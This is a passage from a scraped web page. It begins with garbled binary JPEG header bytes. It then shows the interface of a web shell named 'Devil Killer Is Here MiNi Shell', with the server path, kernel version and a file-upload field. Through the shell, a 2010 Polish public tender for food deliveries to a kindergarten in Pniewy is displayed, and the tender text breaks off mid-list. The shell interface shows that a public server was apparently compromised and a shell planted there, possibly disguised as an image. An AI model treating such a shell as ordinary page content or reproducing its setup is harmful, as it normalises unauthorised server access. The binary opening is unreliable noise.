JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/346055-N-2010.html

<p class="kh_header"><b>Pniewy: Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach</b><br>
<b>Numer ogłoszenia: 346055 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole "Miś" , ul. Dworcowa 23, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2911216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole-mis.pniewy.org</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.przedszkole-mis.pniewy.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Gminy Pniewy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> TABELA  A*  WARZYWA I OWOCE Marchew luzem kg 120 Pietruszka korzeń kg 50	Rzodkiewka świeża p. pęczek	260Sałata  szt. 100 Por korzeń kg 50Cebula biała kg 100Buraki czerwone kg 200 Seler korzeń kg 100Jabłka lobo  kg 210Mandarynki  kg 100Kiwi kg 10Ziemniaki jadalne kg 3000Kapusta czerwona świeża  kg 80Kapusta pekińska  szt. 70Kalafior świeży 	szt. 50	Pomidory luz kg    70	Ogórki szklarniowe kg 70Ogórki kwaszone luz kg  100Kapusta kwaszona kg 150Kapusta biała główka kg kg 100  Pieczarki świeże luz kg 30Banan kg 100 Papryka konserwowa 0,9l szt.	szt. 20 Ogórki konserwowe 0,9l szt. 60	Papryka świeża 	kg 10	Szczypior pęczek 50 Koper śwież pęczek 50 Natka pietruszki p. pęczek 50	Winogrono jasne kg 50	Tabela B*  MIĘSO I PRZETWOR Kości od schabu kg 350 Ogonówka wieprzowa wędzona  kg 150 Boczek wędzony wieprz. B k kg 80Parówka gruba wieprzowa 30%tł. Kg 400 Szynka wieprzowa wędzona got. Kg 150	 Mięso wieprzowe mielone drobne kg 260 Mielonka zapiekana wieprzowa	kg 100 Mięso gulaszowe wieprzowe kg 200 Filet drobiowy z kurczaka kg 170 Żeberka wieprzowe kg 170 Porcje rosołowe z kurczaka kg 150 Kiełbasa wieprzowa gruba kg 300 Udka z kurczaka kg 210	Karkówka b k wieprzowa kg 260 Kaszanka kg 100 Kurczak świeży patroszony do 2kg kg 150 Wątróbka wieprzowa kg  100	Parówka drobiowa cienka kg 150 Kotlet schabowy b k kg 100 Pasztet drobiowy kg 120 Smalec luz kg 150 TABELA C*  MROŻONKI Fasolka szparagowa mrożona 2,5kg op.	szt. 50	Truskawki mrożone  2,5kg op.	 szt. 70	Mieszanka warzywna paski luz 2,5kg op. szt. 150 Brokuły mrożone 2,5kg op. szt. 50 Zupa pieczarkowa, 2,5kg op. szt. 100  Zupa kalafiorowa, 2,5kg op. szt. 160 Zupa jarzynowa, 2,5kg op. szt. 160	Kalafior, 2,5kg op. szt. 60 Pyzy drożdżowe op.9szt szt. 420 Groszek zielony, 2,5kg op. szt. 80 Marchew z groszkiem, 2,5kg op. szt. 80 Wiśnie drążone 2,5kg op. szt. 20 Tabela D* PRZETWORY MĄCZNE, INNE Mąka pszenna 500  kg 300 Ryż długoziarnisty  kg 150 Kawa zbożowa (typu inka)150 g szt. 20 Kasza jęczmienna średnia luz kg 50 Kasza manna 1kg szt. 40 Kisiel różne smaki 40 g	szt. 300	Budyń różne smaki 40 g	szt. 300	Fasola czerwona konserwowa 450g op. szt. 40	Cukier biały kryształ, paczkowany 1kg	szt. 700	Syrop wieloowocowy, wysokosłodzony 1l szt. 50 Napoje różne smaki 0.20l kartonik szt. 1500	Krem do smarowania orzech.-czek. 200g szt. 180 Miód pszczeli nektarowy lipowy 0,5kg szt. 100Dżemy różne smaki 1,15 kg szt. 100 Kakao naturalne 200 g op. szt. 40Majonez dekoracyjny 0,7 kg op.  szt. 60 Musztarda sarepska 0,9 kg op.	szt. 20	Płatki kukurydziane 1 kg op. szt. 60 Groch połówki luz 5 kg op. szt. 40 Fasola sucha luz kg szt. 40 Koncentrat  pomidorowy 30% 0,9 l  szt. 100 Galaretka do ciast różne smaki  0,75g	szt.   240 Proszek do pieczenia 36g szt. 50 Drożdże piekarskie 100g szt. 70 Ketchup łagodny 500g szt.  20	Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 120  Liść laurowy 10g szt. 30 Cukier waniliowy 32g szt. 60 Cukier puder 0,5kg szt. 50 Kwasek cytrynowy spożywczy 20g szt. 40 Rodzynki 200g	szt. 10	Ananas puszka plastry, 0,58 kg	szt. 40	Brzoskwinia puszka połówki, 850dk szt. 50	Kukurydza konserwowa 400 ml	szt. 50	Groszek zielony puszka 400ml szt. 40 Przecier ogórkowy 0,5 kg op. szt. 50 Cynamon 20 g szt. 20 Ziele angielskie 100g szt. 50 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l  szt. 200 Szprot w pomidorach puszka  170g op. szt. 70	Paprykarz szczecinecki 135g op.	szt. 60	Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l  szt. 200 Tabela E* SŁODYCZE Cukierki mieszane czekolad 2,5kg op. szt. 10 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 30 szt op display szt. 20 Wafle kakaowe  b czekolady (typu:Grześki) 30 szt op display szt. 30 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 150	 Figurki czekoladowe - zajączki 80g szt. 270	 Jajka czekoladowe szt.	270 Wafle śmietankowe luz op. 3,2kg szt.8 Tabela F* PIECZYWO Chleb baltonowski 0,6 kg krojony szt. 2000 Chleb razowy 0,5 kg ,,litewski  krojonyszt. 300 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg krojony szt. 700	 Pączki	szt. 800	Bułka tarta 1 kg szt. 80 Babka okrągła średnia 0,5kg szt. 150 Drożdżówki szt. 800  TABELA G*  NABIAŁ Śmietana 12% słodka 0,5l  kartonik szt. 170 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op. szt. 600 Ser homogenizowany  tłusty 200 g  szt. 70 Ser salami luz kg 80 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie  szt. 2300 Mleko 2% karton 1 l op. szt. 1500 Krążek mix  typu Hochlland 140g trójkąty szt. 80 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50	Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 20 Jogurt smakowy 125g szt. 1500 Śmietanka kremowa 36% 0,5l szt. 30 Margaryna zwykła 250g  szt. 530 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200 TABELA H*  MAKARONY I PRZYPRAWY Majeranek 0,30kg op. szt. 20 Delikat do mięs i innych potraw 700g op. szt. 5 Delikat do drobiu 600g op. szt. 3Przyprawa szefa kuchni 5kg op. szt. 7 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 6 Makaron rurki 100% pszenicy Durum 5kg op. szt.  20 Makaron koła 100% pszenicy Durum 5kg op. szt. 20 Makaron łazanki 100% pszenicy Durum 3kg op.	szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 10 Koncentrat pomarańczowy 5l szt.Herbata granulowana 100g op.	szt. 140	Papryka słodka syp. 0,5kg szt. 2	Pieprz mielony 0,5 kg	szt. 4 Przyprawa w płynie 1l szt. 15	Tabela  I*  RYBY Ryby mrożone filet z Pangi kg op. Kg 140 Hamburgery rybne kg 140 Ryby wiadro płaty śledziowe ocet kg 30.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>TABELA  A*  WARZYWA I OWOCE Marchew luzem kg 120 Pietruszka korzeń kg 50	Rzodkiewka świeża p. pęczek	260Sałata  szt. 100 Por korzeń kg 50Cebula biała kg 100Buraki czerwone kg 200 Seler korzeń kg 100Jabłka lobo  kg 210Mandarynki  kg 100Kiwi kg 10Ziemniaki jadalne kg 3000Kapusta czerwona świeża  kg 80Kapusta pekińska  szt. 70Kalafior świeży 	szt. 50	Pomidory luz kg    70	Ogórki szklarniowe kg 70Ogórki kwaszone luz kg  100Kapusta kwaszona kg 150Kapusta biała główka kg kg 100  Pieczarki świeże luz kg 30Banan kg 100 Papryka konserwowa 0,9l szt.	szt. 20 Ogórki konserwowe 0,9l szt. 60	Papryka świeża 	kg 10	Szczypior pęczek 50 Koper śwież pęczek 50 Natka pietruszki p. pęczek 50	Winogrono jasne kg 50	Tabela B*  MIĘSO I PRZETWOR Kości od schabu kg 350 Ogonówka wieprzowa wędzona  kg 150 Boczek wędzony wieprz. B k kg 80Parówka gruba wieprzowa 30%tł. Kg 400 Szynka wieprzowa wędzona got. Kg 150	 Mięso wieprzowe mielone drobne kg 260 Mielonka zapiekana wieprzowa	kg 100 Mięso gulaszowe wieprzowe kg 200 Filet drobiowy z kurczaka kg 170 Żeberka wieprzowe kg 170 Porcje rosołowe z kurczaka kg 150 Kiełbasa wieprzowa gruba kg 300 Udka z kurczaka kg 210	Karkówka b k wieprzowa kg 260 Kaszanka kg 100 Kurczak świeży patroszony do 2kg kg 150 Wątróbka wieprzowa kg  100	Parówka drobiowa cienka kg 150 Kotlet schabowy b k kg 100 Pasztet drobiowy kg 120 Smalec luz kg 150 TABELA C*  MROŻONKI Fasolka szparagowa mrożona 2,5kg op.	szt. 50	Truskawki mrożone  2,5kg op.	 szt. 70	Mieszanka warzywna paski luz 2,5kg op. szt. 150 Brokuły mrożone 2,5kg op. szt. 50 Zupa pieczarkowa, 2,5kg op. szt. 100  Zupa kalafiorowa, 2,5kg op. szt. 160 Zupa jarzynowa, 2,5kg op. szt. 160	Kalafior, 2,5kg op. szt. 60 Pyzy drożdżowe op.9szt szt. 420 Groszek zielony, 2,5kg op. szt. 80 Marchew z groszkiem, 2,5kg op. szt. 80 Wiśnie drążone 2,5kg op. szt. 20 Tabela D* PRZETWORY MĄCZNE, INNE Mąka pszenna 500  kg 300 Ryż długoziarnisty  kg 150 Kawa zbożowa (typu inka)150 g szt. 20 Kasza jęczmienna średnia luz kg 50 Kasza manna 1kg szt. 40 Kisiel różne smaki 40 g	szt. 300	Budyń różne smaki 40 g	szt. 300	Fasola czerwona konserwowa 450g op. szt. 40	Cukier biały kryształ, paczkowany 1kg	szt. 700	Syrop wieloowocowy, wysokosłodzony 1l szt. 50 Napoje różne smaki 0.20l kartonik szt. 1500	Krem do smarowania orzech.-czek. 200g szt. 180 Miód pszczeli nektarowy lipowy 0,5kg szt. 100Dżemy różne smaki 1,15 kg szt. 100 Kakao naturalne 200 g op. szt. 40Majonez dekoracyjny 0,7 kg op.  szt. 60 Musztarda sarepska 0,9 kg op.	szt. 20	Płatki kukurydziane 1 kg op. szt. 60 Groch połówki luz 5 kg op. szt. 40 Fasola sucha luz kg szt. 40 Koncentrat  pomidorowy 30% 0,9 l  szt. 100 Galaretka do ciast różne smaki  0,75g	szt.   240 Proszek do pieczenia 36g szt. 50 Drożdże piekarskie 100g szt. 70 Ketchup łagodny 500g szt.  20	Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 120  Liść laurowy 10g szt. 30 Cukier waniliowy 32g szt. 60 Cukier puder 0,5kg szt. 50 Kwasek cytrynowy spożywczy 20g szt. 40 Rodzynki 200g	szt. 10	Ananas puszka plastry, 0,58 kg	szt. 40	Brzoskwinia puszka połówki, 850dk szt. 50	Kukurydza konserwowa 400 ml	szt. 50	Groszek zielony puszka 400ml szt. 40 Przecier ogórkowy 0,5 kg op. szt. 50 Cynamon 20 g szt. 20 Ziele angielskie 100g szt. 50 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l  szt. 200 Szprot w pomidorach puszka  170g op. szt. 70	Paprykarz szczecinecki 135g op.	szt. 60	Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l  szt. 200 Tabela E* SŁODYCZE Cukierki mieszane czekolad 2,5kg op. szt. 10 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 30 szt op display szt. 20 Wafle kakaowe  b czekolady (typu:Grześki) 30 szt op display szt. 30 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 150	 Figurki czekoladowe - zajączki 80g szt. 270	 Jajka czekoladowe szt.	270 Wafle śmietankowe luz op. 3,2kg szt.8 Tabela F* PIECZYWO Chleb baltonowski 0,6 kg krojony szt. 2000 Chleb razowy 0,5 kg ,,litewski  krojonyszt. 300 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg krojony szt. 700	 Pączki	szt. 800	Bułka tarta 1 kg szt. 80 Babka okrągła średnia 0,5kg szt. 150 Drożdżówki szt. 800  TABELA G*  NABIAŁ Śmietana 12% słodka 0,5l  kartonik szt. 170 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op. szt. 600 Ser homogenizowany  tłusty 200 g  szt. 70 Ser salami luz kg 80 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie  szt. 2300 Mleko 2% karton 1 l op. szt. 1500 Krążek mix  typu Hochlland 140g trójkąty szt. 80 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50	Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 20 Jogurt smakowy 125g szt. 1500 Śmietanka kremowa 36% 0,5l szt. 30 Margaryna zwykła 250g  szt. 530 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200 TABELA H*  MAKARONY I PRZYPRAWY Majeranek 0,30kg op. szt. 20 Delikat do mięs i innych potraw 700g op. szt. 5 Delikat do drobiu 600g op. szt. 3Przyprawa szefa kuchni 5kg op. szt. 7 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 6 Makaron rurki 100% pszenicy Durum 5kg op. szt.  20 Makaron koła 100% pszenicy Durum 5kg op. szt. 20 Makaron łazanki 100% pszenicy Durum 3kg op.	szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 10 Koncentrat pomarańczowy 5l szt.Herbata granulowana 100g op.	szt. 140	Papryka słodka syp. 0,5kg szt. 2	Pieprz mielony 0,5 kg	szt. 4 Przyprawa w płynie 1l szt. 15	Tabela  I*  RYBY Ryby mrożone filet z Pangi kg op. Kg 140 Hamburgery rybne kg 140 Ryby wiadro płaty śledziowe ocet kg 30</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zzamówienia moga ubiegać się wykonawcy, którzy spełniają warunki wynikające z art. 22 ust 1 - 3 ustawy z dnia 29 stycznia 2004 PZP oraz nie podlegaja wykluczeniu na podstawie art. 24 ust 1-2 ustawy, złożą wymaganre i opisane w SIWZ oświadczenia i dokumenty. Informacja o oświadczeniach i dokumentach  jakie mają dostarczyć wykonawcy  w celu potwierdzenia spełnienia warunków udziału w postępowaniu. W celu potwierdzenia spełnienia warunków Oferenci zobowiązani są do przedstawienia w ofercie następujących dokumentów i oświadczeń: Wypełniony formularz oferty dla danej tabeli. Oświadczenie o spełnianiu warunków określonych  w art. 22 ust. 1 oraz art. 24 ust. 1-2 ustawy (załącznik nr 2), aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert  (oryginał lub kopia poświadczona za zgodność z orginałem  przez wykonawcę). W przypadku występowania pełnomocnika należy dołączyć pełnomocnictwo dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lubinnych dokumentów. Dokumenty stanowiące załączniki wymagane przez niniejsze SIWZ muszą zostać wypełnione przez oferenta bez wyjątku ściśle według warunków i postanowień w nich zawartych - bez dokonywania żadnych zmian i uzupełnień. Miejsca wykropkowane przeznaczone do wypełnienia muszą zostać prawidłowo wypełnione.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.przedszkole-mis.pniewy.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miś, ul. Dworcowa 23, 62-045 Pniewy biuro Intendenta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2010 godzina 09:00, miejsce: Siedziba Zamawiającego, na parterze, biuro Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 10.01.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> TABELA  A*  WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchew luzem kg 120 Pietruszka korzeń kg 50	Rzodkiewka świeża p. pęczek	260Sałata  szt. 100 Por korzeń kg 50Cebula biała kg 100Buraki czerwone kg 200 Seler korzeń kg 100Jabłka lobo  kg 210Mandarynki  kg 100Kiwi kg 10Ziemniaki jadalne kg 3000Kapusta czerwona świeża  kg 80Kapusta pekińska  szt. 70Kalafior świeży 	szt. 50	Pomidory luz kg    70	Ogórki szklarniowe kg 70Ogórki kwaszone luz kg  100Kapusta kwaszona kg 150Kapusta biała główka kg kg 100  Pieczarki świeże luz kg 30Banan kg 100 Papryka konserwowa 0,9l szt.	szt. 20 Ogórki konserwowe 0,9l szt. 60	Papryka świeża 	kg 10	Szczypior pęczek 50 Koper śwież pęczek 50 Natka pietruszki p. pęczek 50	Winogrono jasne kg 